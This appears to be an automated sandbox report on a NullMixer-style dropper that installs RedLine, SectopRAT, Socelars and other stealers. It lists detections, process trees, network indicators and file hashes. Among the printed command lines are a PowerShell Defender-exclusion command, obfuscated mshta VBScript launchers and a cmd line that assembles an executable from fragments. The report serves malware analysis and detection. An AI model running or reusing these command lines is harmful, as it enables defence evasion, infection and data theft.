Analysis Overview
SHA256
35794aedc3c64761d4e13da7f7513001bb12388542ee100c3eb9fe3dba84a484
Threat Level: Known bad
The file 35794aedc3c64761d4e13da7f7513001bb12388542ee100c3eb9fe3dba84a484 was found to be: Known bad.
Malicious Activity Summary
Socelars payload
Socelars family
Nullmixer family
OnlyLogger
RedLine
SectopRAT
Onlylogger family
Redline family
Fabookie
Fabookie family
GCleaner
Sectoprat family
NullMixer
Socelars
SectopRAT payload
Detect Fabookie payload
Gcleaner family
RedLine payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
ASPack v2.12-2.42
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Checks installed software on the system
Looks up geolocation information via web service
Looks up external IP address via web service
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates system info in registry
Modifies Internet Explorer settings
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 00:10
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 00:10
Reported
2024-11-08 00:13
Platform
win7-20240903-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
OnlyLogger payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2208 set thread context of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat056c52386ee94b16c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f7843c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053d2789b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05786a45dda23f71f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ae182be20069e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ff081f766eeabb8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe
"C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat057428ebfd0d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053d2789b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053bd2e87da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05786a45dda23f71f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0556e72238ef5897.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat056c52386ee94b16c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05a28e92796e93d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05d374c30e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ff081f766eeabb8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ae182be20069e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat058b772138cf0f3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0546bbc15e4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe
Sat0556e72238ef5897.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat057428ebfd0d.exe
Sat057428ebfd0d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05a28e92796e93d.exe
Sat05a28e92796e93d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe
Sat058b772138cf0f3.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ff081f766eeabb8.exe
Sat05ff081f766eeabb8.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05d374c30e.exe
Sat05d374c30e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05786a45dda23f71f.exe
Sat05786a45dda23f71f.exe
C:\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp" /SL5="$80192,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat056c52386ee94b16c.exe
Sat056c52386ee94b16c.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053d2789b60d.exe
Sat053d2789b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe
Sat0546bbc15e4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ae182be20069e.exe
Sat05ae182be20069e.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 536 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe" ) do taskkill -F -Im "%~nXU"
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
C:\Windows\SysWOW64\taskkill.exe
taskkill -F -Im "Sat0546bbc15e4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 456
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
C:\Windows\SysWOW64\control.exe
control .\FUEj5.QM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\93060639050.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\96481972069.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\86461286425.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0556e72238ef5897.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0556e72238ef5897.exe" /f
C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe
"C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 668
C:\Users\Admin\AppData\Local\Temp\f7843c4.exe
"C:\Users\Admin\AppData\Local\Temp\f7843c4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 652
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.182:80 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| N/A | 127.0.0.1:49287 | | tcp |
| N/A | 127.0.0.1:49289 | | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | safialinks.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.133.1.107:80 | | tcp |
| US | 104.26.3.46:80 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 65.108.20.195:6774 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe
| MD5 | d2c0ac81784893ea8836d60489528679 |
| SHA1 | 2a7bbec3d73cc75d7357d89052b99a39f2cc7258 |
| SHA256 | fffb99157b6596b90ed54dfc493e143c34bbabc262261291bb62738e7d3c070d |
| SHA512 | 4ab47b782b405d278c8600811cda54457a1cca60af5e6fde0763a44a0746f89d43205cef91f21aec95fe0d8ebcd2513d50922c8dbd311d0bf5a66d6f239b2e2f |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe
| MD5 | cd751dfbcb3f9620d31592933fa29dae |
| SHA1 | 7d10974664a2b7ea55ebc831bfac06ec3e1c9815 |
| SHA256 | e8047ab236cbd563304399f11e5e737e6c8b90647ed7f6bbac4ed60c19c5a9c7 |
| SHA512 | e2d74dc14081737f877b86428a1467dc6b79220a1fb7901be55366be2eb488f75cf47a69e620db91f0df91401e72ae00d528c47cc134afbd0da1fbf274af7b6b |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ff081f766eeabb8.exe
| MD5 | 7b3895d03448f659e2934a8f9b0a52ae |
| SHA1 | 084dc9cd061c5fb90bfc17a935d9b6ca8947a33c |
| SHA256 | 898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097 |
| SHA512 | dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05d374c30e.exe
